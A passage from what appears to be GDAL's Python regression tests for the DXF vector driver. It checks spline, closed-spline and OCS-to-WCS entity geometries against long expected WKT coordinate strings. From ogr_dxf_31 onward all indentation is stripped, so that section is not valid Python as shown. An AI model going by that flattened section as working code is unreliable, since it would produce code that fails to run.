    feat = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry( feat, 'LINESTRING (2 2, 2.10976576805115 2.16451454162598, 2.23113083839417 2.34563326835632, 2.35994720458984 2.53639197349548, 2.49239826202393 2.73041176795959, 2.62522411346436 2.92225241661072, 2.75582838058472 3.10756635665894, 2.88229131698608 3.2831084728241, 3.00331926345825 3.44663000106812, 3.11815142631531 3.59672045707703, 3.2264621257782 3.73262500762939, 3.32825922966003 3.85407567024231, 3.42379808425903 3.96113181114197, 3.51351404190063 4.05405473709106, 3.59796214103699 4.13319540023804, 3.67778849601746 4.19891929626465, 3.75369834899902 4.25152969360352, 3.82645153999329 4.29121112823486, 3.89685702323914 4.31797361373901, 3.96579027175903 4.33159732818604, 4.03421020507812 4.33159732818604, 4.1031436920166 4.31797361373901, 4.17354917526245 4.29121017456055, 4.24630165100098 4.2515287399292, 4.32221221923828 4.19891929626465, 4.40203857421875 4.13319492340088, 4.48648738861084 4.05405378341675, 4.57620286941528 3.96113133430481, 4.67174291610718 3.85407471656799, 4.77353954315186 3.73262333869934, 4.88184928894043 3.59671831130981, 4.99668216705322 3.44662809371948, 5.11771011352539 3.28310608863831, 5.24417400360107 3.10756373405457, 5.37477827072144 2.92224931716919, 5.50760412216187 2.73040890693665, 5.64005517959595 2.5363883972168, 5.76887130737305 2.34562969207764, 5.89023685455322 2.16451120376587, 6 2)' ):
        feat.DumpReadable()
        return 'fail'

    # spline 262, weight(3) = 0.5
    feat = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry( feat, 'LINESTRING (2 2, 2.09894275665283 2.14827871322632, 2.19183802604675 2.28667020797729, 2.28029608726501 2.41674375534058, 2.36573505401611 2.53972935676575, 2.4494321346283 2.65657186508179, 2.53256177902222 2.76796913146973, 2.61621570587158 2.87439489364624, 2.70142364501953 2.97611308097839, 2.78915071487427 3.07318329811096, 2.88029623031616 3.16546249389648, 2.97567653656006 3.25260472297668, 3.07599782943726 3.33406257629395, 3.18181824684143 3.40909075737, 3.29349946975708 3.4767644405365, 3.4111499786377 3.53600478172302, 3.53456783294678 3.58562660217285, 3.66318273544312 3.62440752983093, 3.79601716995239 3.6511766910553, 3.93166828155518 3.66492199897766, 4.06833267211914 3.66492199897766, 4.20398426055908 3.65117692947388, 4.33681774139404 3.62440729141235, 4.4654335975647 3.58562660217285, 4.58885097503662 3.53600406646729, 4.70650196075439 3.47676372528076, 4.81818294525146 3.40909028053284, 4.92400360107422 3.33406162261963, 5.02432489395142 3.25260376930237, 5.11970520019531 3.16546106338501, 5.21085071563721 3.07318210601807, 5.29857730865479 2.9761118888855, 5.38378524780273 2.87439346313477, 5.46744012832642 2.76796770095825, 5.55056858062744 2.65656995773315, 5.63426637649536 2.53972721099854, 5.71970558166504 2.41674160957336, 5.8081636428833 2.2866678237915, 5.9010591506958 2.14827609062195, 6 2)' ):
        feat.DumpReadable()
        return 'fail'

    ds = None

    return 'success'
###############################################################################
# SPLINE closed
def ogr_dxf_30():
    """Read closed SPLINE entities (data/spline_closed.dxf); the second
    variant has its knot vector recalculated, and both should tessellate to
    the same closed linestring."""

    ds = ogr.Open('data/spline_closed.dxf')
    lyr = ds.GetLayer(0)

    # spline 24b, closed
    feat = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry( feat, 'LINESTRING (14 2, 13.9043273925781 2.11115527153015, 13.82310962677 2.23728489875793, 13.7564849853516 2.3759388923645, 13.7045974731445 2.52466750144958, 13.6675891876221 2.68102264404297, 13.6455984115601 2.84255337715149, 13.6387672424316 3.00681042671204, 13.6472396850586 3.17134499549866, 13.6711559295654 3.33370733261108, 13.7106552124023 3.49144792556763, 13.7658815383911 3.64211750030518, 13.8369770050049 3.78326630592346, 13.9240808486938 3.9124448299408, 14.0273275375366 4.0272102355957, 14.1460762023926 4.125901222229, 14.2781581878662 4.20836925506592, 14.4212408065796 4.27464532852173, 14.5729866027832 4.32475566864014, 14.7310619354248 4.35873079299927, 14.8931264877319 4.37659645080566, 15.056845664978 4.37838315963745, 15.2198839187622 4.36411762237549, 15.3799018859863 4.33382892608643, 15.5345678329468 4.2875452041626, 15.681544303894 4.22529458999634, 15.8184909820557 4.14710569381714, 15.9430751800537 4.05300617218018, 16.0530071258545 3.94307255744934, 16.1471080780029 3.81848883628845, 16.2252960205078 3.68154096603394, 16.2875461578369 3.53456616401672, 16.3338298797607 3.37990093231201, 16.3641166687012 3.219881772995, 16.3783836364746 3.05684399604797, 16.3765964508057 2.89312481880188, 16.3587284088135 2.73106050491333, 16.3247547149658 2.57298684120178, 16.2746448516846 2.42124080657959, 16.2083702087402 2.27815842628479, 16.1259021759033 2.146075963974, 16.0272102355957 2.02732920646667, 15.9124450683594 1.92408156394958, 15.7832660675049 1.83697760105133, 15.6421175003052 1.7658828496933, 15.4914503097534 1.71065592765808, 15.3337097167969 1.67115533351898, 15.1713457107544 1.6472395658493, 15.0068111419678 1.63876724243164, 14.8425559997559 1.64559710025787, 14.681022644043 1.66758728027344, 14.5246696472168 1.70459699630737, 14.375940322876 1.75648427009583, 14.2372856140137 1.82310783863068, 14.1111574172974 1.90432631969452, 14 2)' ):
        feat.DumpReadable()
        return 'fail'

    # spline 24c, closed, recalculate knots
    feat = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry( feat, 'LINESTRING (14 2, 13.9043273925781 2.11115527153015, 13.82310962677 2.23728489875793, 13.7564849853516 2.3759388923645, 13.7045974731445 2.52466750144958, 13.6675891876221 2.68102264404297, 13.6455984115601 2.84255337715149, 13.6387672424316 3.00681042671204, 13.6472396850586 3.17134499549866, 13.6711559295654 3.33370733261108, 13.7106552124023 3.49144792556763, 13.7658815383911 3.64211750030518, 13.8369770050049 3.78326630592346, 13.9240808486938 3.9124448299408, 14.0273275375366 4.0272102355957, 14.1460762023926 4.125901222229, 14.2781581878662 4.20836925506592, 14.4212408065796 4.27464532852173, 14.5729866027832 4.32475566864014, 14.7310619354248 4.35873079299927, 14.8931264877319 4.37659645080566, 15.056845664978 4.37838315963745, 15.2198839187622 4.36411762237549, 15.3799018859863 4.33382892608643, 15.5345678329468 4.2875452041626, 15.681544303894 4.22529458999634, 15.8184909820557 4.14710569381714, 15.9430751800537 4.05300617218018, 16.0530071258545 3.94307255744934, 16.1471080780029 3.81848883628845, 16.2252960205078 3.68154096603394, 16.2875461578369 3.53456616401672, 16.3338298797607 3.37990093231201, 16.3641166687012 3.219881772995, 16.3783836364746 3.05684399604797, 16.3765964508057 2.89312481880188, 16.3587284088135 2.73106050491333, 16.3247547149658 2.57298684120178, 16.2746448516846 2.42124080657959, 16.2083702087402 2.27815842628479, 16.1259021759033 2.146075963974, 16.0272102355957 2.02732920646667, 15.9124450683594 1.92408156394958, 15.7832660675049 1.83697760105133, 15.6421175003052 1.7658828496933, 15.4914503097534 1.71065592765808, 15.3337097167969 1.67115533351898, 15.1713457107544 1.6472395658493, 15.0068111419678 1.63876724243164, 14.8425559997559 1.64559710025787, 14.681022644043 1.66758728027344, 14.5246696472168 1.70459699630737, 14.375940322876 1.75648427009583, 14.2372856140137 1.82310783863068, 14.1111574172974 1.90432631969452, 14 2)' ):
        feat.DumpReadable()
        return 'fail'

    ds = None

    return 'success'
###############################################################################
# OCS2WCS transformations 1
def ogr_dxf_31():
ds = ogr.Open('data/ocs2wcs1.dxf')
lyr = ds.GetLayer(0)
# INFO: Open of `ocs2wcs1.dxf' using driver `DXF' successful.
# OGRFeature(entities):0
# EntityHandle (String) = 1EF
# POINT Z (4 4 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POINT Z (4 4 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):1
# EntityHandle (String) = 1F0
# LINESTRING Z (0 0 0,1 1 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (0 0 0,1 1 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):2
# EntityHandle (String) = 1F1
# LINESTRING (1 1,2 1,1 2,1 1)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (1 1,2 1,1 2,1 1)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):3
# EntityHandle (String) = 1F2
# LINESTRING Z (1 1 0,1 2 0,2 2 0,1 1 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (1 1 0,1 2 0,2 2 0,1 1 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):4
# EntityHandle (String) = 1F7
# LINESTRING Z (6 4 0,5.99512810051965 3.86048705251175 0,5.98053613748314 3.72165379807987 0,5.95629520146761 3.58417661836448 0,5.92252339187664 3.448725288366 0,5.87938524157182 3.31595971334866 0,5.8270909152852 3.1865267138484 0,5.76589518571785 3.06105687442822 0,5.69609619231285 2.94016147153359 0,5.61803398874989 2.82442949541505 0,5.53208888623796 2.71442478062692 0,5.4386796006773 2.61068325908201 0,5.33826121271772 2.51371034904521 0,5.23132295065132 2.42397849278656 0,5.11838580694149 2.34192485488992 0,5.0 2.26794919243112 0,4.87674229357815 2.20241190740167 0,4.74921318683182 2.14563229086643 0,4.61803398874989 2.09788696740969 0,4.48384379119934 2.05940854744801 0,4.34729635533386 2.03038449397558 0,4.20905692653531 2.01095620926345 0,4.069798993405 2.00121834596181 0,3.930201006595 2.00121834596181 0,3.79094307346469 2.01095620926345 0,3.65270364466614 2.03038449397558 0,3.51615620880066 2.05940854744801 0,3.38196601125011 2.09788696740969 0,3.25078681316818 2.14563229086643 0,3.12325770642185 2.20241190740167 0,3.0 2.26794919243112 0,2.88161419305851 2.34192485488992 0,2.76867704934868 2.42397849278656 0,2.66173878728228 2.51371034904521 0,2.5613203993227 2.61068325908201 0,2.46791111376204 2.71442478062692 0,2.38196601125011 2.82442949541505 0,2.30390380768715 2.94016147153359 0,2.23410481428215 3.06105687442822 0,2.1729090847148 3.1865267138484 0,2.12061475842818 3.31595971334866 0,2.07747660812336 3.448725288366 0,2.04370479853239 3.58417661836448 0,2.01946386251686 3.72165379807987 0,2.00487189948035 3.86048705251175 0,2.0 4.0 0,2.00487189948035 4.13951294748825 0,2.01946386251686 4.27834620192013 0,2.04370479853239 4.41582338163552 0,2.07747660812336 4.551274711634 0,2.12061475842818 4.68404028665134 0,2.1729090847148 4.8134732861516 0,2.23410481428215 4.93894312557178 0,2.30390380768715 5.05983852846641 0,2.38196601125011 5.17557050458495 0,2.46791111376204 5.28557521937308 0,2.5613203993227 5.38931674091799 0,2.66173878728228 
5.48628965095479 0,2.76867704934868 5.57602150721344 0,2.88161419305851 5.65807514511008 0,3.0 5.73205080756888 0,3.12325770642184 5.79758809259833 0,3.25078681316818 5.85436770913357 0,3.38196601125011 5.90211303259031 0,3.51615620880066 5.94059145255199 0,3.65270364466614 5.96961550602442 0,3.79094307346469 5.98904379073655 0,3.930201006595 5.99878165403819 0,4.069798993405 5.99878165403819 0,4.20905692653531 5.98904379073655 0,4.34729635533386 5.96961550602442 0,4.48384379119933 5.94059145255199 0,4.61803398874989 5.90211303259031 0,4.74921318683182 5.85436770913357 0,4.87674229357815 5.79758809259833 0,5.0 5.73205080756888 0,5.11838580694149 5.65807514511008 0,5.23132295065132 5.57602150721344 0,5.33826121271772 5.48628965095479 0,5.4386796006773 5.389316740918 0,5.53208888623796 5.28557521937308 0,5.61803398874989 5.17557050458495 0,5.69609619231285 5.05983852846641 0,5.76589518571785 4.93894312557178 0,5.8270909152852 4.8134732861516 0,5.87938524157182 4.68404028665134 0,5.92252339187664 4.551274711634 0,5.95629520146761 4.41582338163552 0,5.98053613748314 4.27834620192013 0,5.99512810051965 4.13951294748825 0,6.0 4.0 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (6 4 0,5.99512810051965 3.86048705251175 0,5.98053613748314 3.72165379807987 0,5.95629520146761 3.58417661836448 0,5.92252339187664 3.448725288366 0,5.87938524157182 3.31595971334866 0,5.8270909152852 3.1865267138484 0,5.76589518571785 3.06105687442822 0,5.69609619231285 2.94016147153359 0,5.61803398874989 2.82442949541505 0,5.53208888623796 2.71442478062692 0,5.4386796006773 2.61068325908201 0,5.33826121271772 2.51371034904521 0,5.23132295065132 2.42397849278656 0,5.11838580694149 2.34192485488992 0,5.0 2.26794919243112 0,4.87674229357815 2.20241190740167 0,4.74921318683182 2.14563229086643 0,4.61803398874989 2.09788696740969 0,4.48384379119934 2.05940854744801 0,4.34729635533386 2.03038449397558 0,4.20905692653531 2.01095620926345 0,4.069798993405 2.00121834596181 0,3.930201006595 2.00121834596181 0,3.79094307346469 2.01095620926345 0,3.65270364466614 2.03038449397558 0,3.51615620880066 2.05940854744801 0,3.38196601125011 2.09788696740969 0,3.25078681316818 2.14563229086643 0,3.12325770642185 2.20241190740167 0,3.0 2.26794919243112 0,2.88161419305851 2.34192485488992 0,2.76867704934868 2.42397849278656 0,2.66173878728228 2.51371034904521 0,2.5613203993227 2.61068325908201 0,2.46791111376204 2.71442478062692 0,2.38196601125011 2.82442949541505 0,2.30390380768715 2.94016147153359 0,2.23410481428215 3.06105687442822 0,2.1729090847148 3.1865267138484 0,2.12061475842818 3.31595971334866 0,2.07747660812336 3.448725288366 0,2.04370479853239 3.58417661836448 0,2.01946386251686 3.72165379807987 0,2.00487189948035 3.86048705251175 0,2.0 4.0 0,2.00487189948035 4.13951294748825 0,2.01946386251686 4.27834620192013 0,2.04370479853239 4.41582338163552 0,2.07747660812336 4.551274711634 0,2.12061475842818 4.68404028665134 0,2.1729090847148 4.8134732861516 0,2.23410481428215 4.93894312557178 0,2.30390380768715 5.05983852846641 0,2.38196601125011 5.17557050458495 0,2.46791111376204 5.28557521937308 0,2.5613203993227 
5.38931674091799 0,2.66173878728228 5.48628965095479 0,2.76867704934868 5.57602150721344 0,2.88161419305851 5.65807514511008 0,3.0 5.73205080756888 0,3.12325770642184 5.79758809259833 0,3.25078681316818 5.85436770913357 0,3.38196601125011 5.90211303259031 0,3.51615620880066 5.94059145255199 0,3.65270364466614 5.96961550602442 0,3.79094307346469 5.98904379073655 0,3.930201006595 5.99878165403819 0,4.069798993405 5.99878165403819 0,4.20905692653531 5.98904379073655 0,4.34729635533386 5.96961550602442 0,4.48384379119933 5.94059145255199 0,4.61803398874989 5.90211303259031 0,4.74921318683182 5.85436770913357 0,4.87674229357815 5.79758809259833 0,5.0 5.73205080756888 0,5.11838580694149 5.65807514511008 0,5.23132295065132 5.57602150721344 0,5.33826121271772 5.48628965095479 0,5.4386796006773 5.389316740918 0,5.53208888623796 5.28557521937308 0,5.61803398874989 5.17557050458495 0,5.69609619231285 5.05983852846641 0,5.76589518571785 4.93894312557178 0,5.8270909152852 4.8134732861516 0,5.87938524157182 4.68404028665134 0,5.92252339187664 4.551274711634 0,5.95629520146761 4.41582338163552 0,5.98053613748314 4.27834620192013 0,5.99512810051965 4.13951294748825 0,6.0 4.0 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):5
# EntityHandle (String) = 1F8
# LINESTRING Z (2 4 0,2.00487189948035 4.06975647374412 0,2.01946386251686 4.13917310096007 0,2.04370479853239 4.20791169081776 0,2.07747660812336 4.275637355817 0,2.12061475842818 4.34202014332567 0,2.1729090847148 4.4067366430758 0,2.23410481428215 4.46947156278589 0,2.30390380768715 4.52991926423321 0,2.38196601125011 4.58778525229247 0,2.46791111376204 4.64278760968654 0,2.5613203993227 4.694658370459 0,2.66173878728228 4.74314482547739 0,2.76867704934868 4.78801075360672 0,2.88161419305851 4.82903757255504 0,3.0 4.86602540378444 0,3.12325770642185 4.89879404629917 0,3.25078681316818 4.92718385456679 0,3.38196601125011 4.95105651629515 0,3.51615620880067 4.970295726276 0,3.65270364466614 4.98480775301221 0,3.79094307346469 4.99452189536827 0,3.930201006595 4.9993908270191 0,4.069798993405 4.9993908270191 0,4.20905692653531 4.99452189536827 0,4.34729635533386 4.98480775301221 0,4.48384379119934 4.970295726276 0,4.61803398874989 4.95105651629515 0,4.74921318683182 4.92718385456679 0,4.87674229357816 4.89879404629917 0,5.0 4.86602540378444 0,5.11838580694149 4.82903757255504 0,5.23132295065132 4.78801075360672 0,5.33826121271772 4.74314482547739 0,5.4386796006773 4.694658370459 0,5.53208888623796 4.64278760968654 0,5.61803398874989 4.58778525229247 0,5.69609619231285 4.5299192642332 0,5.76589518571785 4.46947156278589 0,5.8270909152852 4.4067366430758 0,5.87938524157182 4.34202014332567 0,5.92252339187664 4.275637355817 0,5.95629520146761 4.20791169081776 0,5.98053613748314 4.13917310096006 0,5.99512810051965 4.06975647374412 0,6.0 4.0 0,5.99512810051965 3.93024352625587 0,5.98053613748314 3.86082689903993 0,5.95629520146761 3.79208830918224 0,5.92252339187664 3.724362644183 0,5.87938524157182 3.65797985667433 0,5.8270909152852 3.5932633569242 0,5.76589518571785 3.53052843721411 0,5.69609619231285 3.4700807357668 0,5.61803398874989 3.41221474770753 0,5.53208888623796 3.35721239031346 0,5.4386796006773 3.305341629541 0,5.33826121271772 3.25685517452261 
0,5.23132295065132 3.21198924639328 0,5.11838580694149 3.17096242744496 0,5.0 3.13397459621556 0,4.87674229357815 3.10120595370083 0,4.74921318683182 3.07281614543321 0,4.61803398874989 3.04894348370485 0,4.48384379119934 3.029704273724 0,4.34729635533386 3.01519224698779 0,4.20905692653531 3.00547810463173 0,4.069798993405 3.0006091729809 0,3.930201006595 3.0006091729809 0,3.79094307346469 3.00547810463173 0,3.65270364466614 3.01519224698779 0,3.51615620880066 3.029704273724 0,3.38196601125011 3.04894348370485 0,3.25078681316818 3.07281614543321 0,3.12325770642185 3.10120595370083 0,3.0 3.13397459621556 0,2.88161419305851 3.17096242744496 0,2.76867704934868 3.21198924639328 0,2.66173878728228 3.25685517452261 0,2.5613203993227 3.305341629541 0,2.46791111376204 3.35721239031346 0,2.38196601125011 3.41221474770753 0,2.30390380768715 3.4700807357668 0,2.23410481428215 3.53052843721411 0,2.1729090847148 3.5932633569242 0,2.12061475842818 3.65797985667433 0,2.07747660812336 3.724362644183 0,2.04370479853239 3.79208830918224 0,2.01946386251686 3.86082689903993 0,2.00487189948035 3.93024352625587 0,2 4 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (2 4 0,2.00487189948035 4.06975647374412 0,2.01946386251686 4.13917310096007 0,2.04370479853239 4.20791169081776 0,2.07747660812336 4.275637355817 0,2.12061475842818 4.34202014332567 0,2.1729090847148 4.4067366430758 0,2.23410481428215 4.46947156278589 0,2.30390380768715 4.52991926423321 0,2.38196601125011 4.58778525229247 0,2.46791111376204 4.64278760968654 0,2.5613203993227 4.694658370459 0,2.66173878728228 4.74314482547739 0,2.76867704934868 4.78801075360672 0,2.88161419305851 4.82903757255504 0,3.0 4.86602540378444 0,3.12325770642185 4.89879404629917 0,3.25078681316818 4.92718385456679 0,3.38196601125011 4.95105651629515 0,3.51615620880067 4.970295726276 0,3.65270364466614 4.98480775301221 0,3.79094307346469 4.99452189536827 0,3.930201006595 4.9993908270191 0,4.069798993405 4.9993908270191 0,4.20905692653531 4.99452189536827 0,4.34729635533386 4.98480775301221 0,4.48384379119934 4.970295726276 0,4.61803398874989 4.95105651629515 0,4.74921318683182 4.92718385456679 0,4.87674229357816 4.89879404629917 0,5.0 4.86602540378444 0,5.11838580694149 4.82903757255504 0,5.23132295065132 4.78801075360672 0,5.33826121271772 4.74314482547739 0,5.4386796006773 4.694658370459 0,5.53208888623796 4.64278760968654 0,5.61803398874989 4.58778525229247 0,5.69609619231285 4.5299192642332 0,5.76589518571785 4.46947156278589 0,5.8270909152852 4.4067366430758 0,5.87938524157182 4.34202014332567 0,5.92252339187664 4.275637355817 0,5.95629520146761 4.20791169081776 0,5.98053613748314 4.13917310096006 0,5.99512810051965 4.06975647374412 0,6.0 4.0 0,5.99512810051965 3.93024352625587 0,5.98053613748314 3.86082689903993 0,5.95629520146761 3.79208830918224 0,5.92252339187664 3.724362644183 0,5.87938524157182 3.65797985667433 0,5.8270909152852 3.5932633569242 0,5.76589518571785 3.53052843721411 0,5.69609619231285 3.4700807357668 0,5.61803398874989 3.41221474770753 0,5.53208888623796 3.35721239031346 0,5.4386796006773 3.305341629541 
0,5.33826121271772 3.25685517452261 0,5.23132295065132 3.21198924639328 0,5.11838580694149 3.17096242744496 0,5.0 3.13397459621556 0,4.87674229357815 3.10120595370083 0,4.74921318683182 3.07281614543321 0,4.61803398874989 3.04894348370485 0,4.48384379119934 3.029704273724 0,4.34729635533386 3.01519224698779 0,4.20905692653531 3.00547810463173 0,4.069798993405 3.0006091729809 0,3.930201006595 3.0006091729809 0,3.79094307346469 3.00547810463173 0,3.65270364466614 3.01519224698779 0,3.51615620880066 3.029704273724 0,3.38196601125011 3.04894348370485 0,3.25078681316818 3.07281614543321 0,3.12325770642185 3.10120595370083 0,3.0 3.13397459621556 0,2.88161419305851 3.17096242744496 0,2.76867704934868 3.21198924639328 0,2.66173878728228 3.25685517452261 0,2.5613203993227 3.305341629541 0,2.46791111376204 3.35721239031346 0,2.38196601125011 3.41221474770753 0,2.30390380768715 3.4700807357668 0,2.23410481428215 3.53052843721411 0,2.1729090847148 3.5932633569242 0,2.12061475842818 3.65797985667433 0,2.07747660812336 3.724362644183 0,2.04370479853239 3.79208830918224 0,2.01946386251686 3.86082689903993 0,2.00487189948035 3.93024352625587 0,2 4 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):6
# EntityHandle (String) = 1F9
# LINESTRING Z (2.0 2.0 0,1.96657794502105 2.03582232791524 0,1.93571660708646 2.07387296203834 0,1.90756413746468 2.11396923855471 0,1.88225568337755 2.15591867344963 0,1.85991273921989 2.19951988653655 0,1.84064256332004 2.24456356819194 0,1.8245376630414 2.29083348415575 0,1.81167535069652 2.33810751357387 0,1.80211737240583 2.38615871529951 0,1.79590961168258 2.43475641733454 0,1.79308186916688 2.48366732418105 0,1.79364771956639 2.53265663678705 0,1.79760444649032 2.58148917971011 0,1.80493305548955 2.62993053008785 0,1.81559836524041 2.67774814299566 0,1.8295491764342 2.72471246778926 0,1.84671851756181 2.7705980500731 0,1.86702396641357 2.81518461400453 0,1.89036804575079 2.85825811973811 0,1.91663869124976 2.89961179093366 0,1.94570978947168 2.93904710739563 0,1.97744178327594 2.97637475807832 0,2.01168234177068 3.01141554988232 0,2.04826709158413 3.04400126787917 0,2.08702040594658 3.07397548283483 0,2.12775624779472 3.10119430215541 0,2.17027906285109 3.12552706065018 0,2.2143847183914 3.14685694779575 0,2.25986148319297 3.16508156849045 0,2.30649104396024 3.18011343460661 0,2.35404955334774 3.1918803849814 0,2.40230870454951 3.20032593182975 0,2.45103682729644 3.2054095319166 0,2.5 3.20710678118655 0,2.54896317270356 3.2054095319166 0,2.59769129545049 3.20032593182975 0,2.64595044665226 3.1918803849814 0,2.69350895603976 3.18011343460661 0,2.74013851680703 3.16508156849045 0,2.7856152816086 3.14685694779575 0,2.8297209371489 3.12552706065018 0,2.87224375220528 3.10119430215541 0,2.91297959405342 3.07397548283483 0,2.95173290841587 3.04400126787917 0,2.98831765822932 3.01141554988232 0,3.02255821672406 2.97637475807832 0,3.05429021052832 2.93904710739563 0,3.08336130875024 2.89961179093367 0,3.10963195424921 2.85825811973811 0,3.13297603358643 2.81518461400453 0,3.15328148243819 2.7705980500731 0,3.1704508235658 2.72471246778926 0,3.18440163475959 2.67774814299567 0,3.19506694451045 2.62993053008786 0,3.20239555350968 2.58148917971011 0,3.20635228043361 
2.53265663678705 0,3.20691813083312 2.48366732418105 0,3.20409038831742 2.43475641733454 0,3.19788262759417 2.38615871529951 0,3.18832464930348 2.33810751357387 0,3.1754623369586 2.29083348415575 0,3.15935743667996 2.24456356819194 0,3.14008726078011 2.19951988653655 0,3.11774431662245 2.15591867344963 0,3.09243586253532 2.11396923855472 0,3.06428339291354 2.07387296203834 0,3.03342205497895 2.03582232791524 0,3 2 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (2.0 2.0 0,1.96657794502105 2.03582232791524 0,1.93571660708646 2.07387296203834 0,1.90756413746468 2.11396923855471 0,1.88225568337755 2.15591867344963 0,1.85991273921989 2.19951988653655 0,1.84064256332004 2.24456356819194 0,1.8245376630414 2.29083348415575 0,1.81167535069652 2.33810751357387 0,1.80211737240583 2.38615871529951 0,1.79590961168258 2.43475641733454 0,1.79308186916688 2.48366732418105 0,1.79364771956639 2.53265663678705 0,1.79760444649032 2.58148917971011 0,1.80493305548955 2.62993053008785 0,1.81559836524041 2.67774814299566 0,1.8295491764342 2.72471246778926 0,1.84671851756181 2.7705980500731 0,1.86702396641357 2.81518461400453 0,1.89036804575079 2.85825811973811 0,1.91663869124976 2.89961179093366 0,1.94570978947168 2.93904710739563 0,1.97744178327594 2.97637475807832 0,2.01168234177068 3.01141554988232 0,2.04826709158413 3.04400126787917 0,2.08702040594658 3.07397548283483 0,2.12775624779472 3.10119430215541 0,2.17027906285109 3.12552706065018 0,2.2143847183914 3.14685694779575 0,2.25986148319297 3.16508156849045 0,2.30649104396024 3.18011343460661 0,2.35404955334774 3.1918803849814 0,2.40230870454951 3.20032593182975 0,2.45103682729644 3.2054095319166 0,2.5 3.20710678118655 0,2.54896317270356 3.2054095319166 0,2.59769129545049 3.20032593182975 0,2.64595044665226 3.1918803849814 0,2.69350895603976 3.18011343460661 0,2.74013851680703 3.16508156849045 0,2.7856152816086 3.14685694779575 0,2.8297209371489 3.12552706065018 0,2.87224375220528 3.10119430215541 0,2.91297959405342 3.07397548283483 0,2.95173290841587 3.04400126787917 0,2.98831765822932 3.01141554988232 0,3.02255821672406 2.97637475807832 0,3.05429021052832 2.93904710739563 0,3.08336130875024 2.89961179093367 0,3.10963195424921 2.85825811973811 0,3.13297603358643 2.81518461400453 0,3.15328148243819 2.7705980500731 0,3.1704508235658 2.72471246778926 0,3.18440163475959 2.67774814299567 0,3.19506694451045 2.62993053008786 
0,3.20239555350968 2.58148917971011 0,3.20635228043361 2.53265663678705 0,3.20691813083312 2.48366732418105 0,3.20409038831742 2.43475641733454 0,3.19788262759417 2.38615871529951 0,3.18832464930348 2.33810751357387 0,3.1754623369586 2.29083348415575 0,3.15935743667996 2.24456356819194 0,3.14008726078011 2.19951988653655 0,3.11774431662245 2.15591867344963 0,3.09243586253532 2.11396923855472 0,3.06428339291354 2.07387296203834 0,3.03342205497895 2.03582232791524 0,3 2 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):7
# EntityHandle (String) = 1FA
# POLYGON Z ((1 2 0,1 3 0,2 3 0,2 2 0,1 2 0))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON Z ((1 2 0,1 3 0,2 3 0,2 2 0,1 2 0))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):8
# EntityHandle (String) = 1FB
# POLYGON ((3 4,4 4,4 3,3 3,3 4))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON ((3 4,4 4,4 3,3 3,3 4))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):9
# EntityHandle (String) = 1FD
# POLYGON ((8 8,9 8,9 9,8 9,8 8))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON ((8 8,9 8,9 9,8 9,8 8))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):10
# EntityHandle (String) = 200
# LINESTRING (2 2,2.15384615384615 2.15384615384615,2.30769230769231 2.30769230769231,2.46153846153846 2.46153846153846,2.61538461538461 2.61538461538461,2.76923076923077 2.76923076923077,2.92307692307692 2.92307692307692,3.07692307692308 3.07692307692308,3.23076923076923 3.23076923076923,3.38461538461538 3.38461538461538,3.53846153846154 3.53846153846154,3.69230769230769 3.69230769230769,3.84615384615385 3.84615384615385,4 4,4.15384615384615 4.15384615384615,4.30769230769231 4.30769230769231,4.46153846153846 4.46153846153846,4.61538461538462 4.61538461538462,4.76923076923077 4.76923076923077,4.92307692307692 4.92307692307692,5.07692307692308 5.07692307692308,5.23076923076923 5.23076923076923,5.38461538461538 5.38461538461538,5.53846153846154 5.53846153846154,5.69230769230769 5.69230769230769,5.84615384615385 5.84615384615385,6.0 6.0,6.15384615384615 6.15384615384615,6.30769230769231 6.30769230769231,6.46153846153846 6.46153846153846,6.61538461538462 6.61538461538462,6.76923076923077 6.76923076923077,6.92307692307692 6.92307692307692,7.07692307692308 7.07692307692308,7.23076923076923 7.23076923076923,7.38461538461539 7.38461538461539,7.53846153846154 7.53846153846154,7.69230769230769 7.69230769230769,7.84615384615385 7.84615384615385,8 8)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (2 2,2.15384615384615 2.15384615384615,2.30769230769231 2.30769230769231,2.46153846153846 2.46153846153846,2.61538461538461 2.61538461538461,2.76923076923077 2.76923076923077,2.92307692307692 2.92307692307692,3.07692307692308 3.07692307692308,3.23076923076923 3.23076923076923,3.38461538461538 3.38461538461538,3.53846153846154 3.53846153846154,3.69230769230769 3.69230769230769,3.84615384615385 3.84615384615385,4 4,4.15384615384615 4.15384615384615,4.30769230769231 4.30769230769231,4.46153846153846 4.46153846153846,4.61538461538462 4.61538461538462,4.76923076923077 4.76923076923077,4.92307692307692 4.92307692307692,5.07692307692308 5.07692307692308,5.23076923076923 5.23076923076923,5.38461538461538 5.38461538461538,5.53846153846154 5.53846153846154,5.69230769230769 5.69230769230769,5.84615384615385 5.84615384615385,6.0 6.0,6.15384615384615 6.15384615384615,6.30769230769231 6.30769230769231,6.46153846153846 6.46153846153846,6.61538461538462 6.61538461538462,6.76923076923077 6.76923076923077,6.92307692307692 6.92307692307692,7.07692307692308 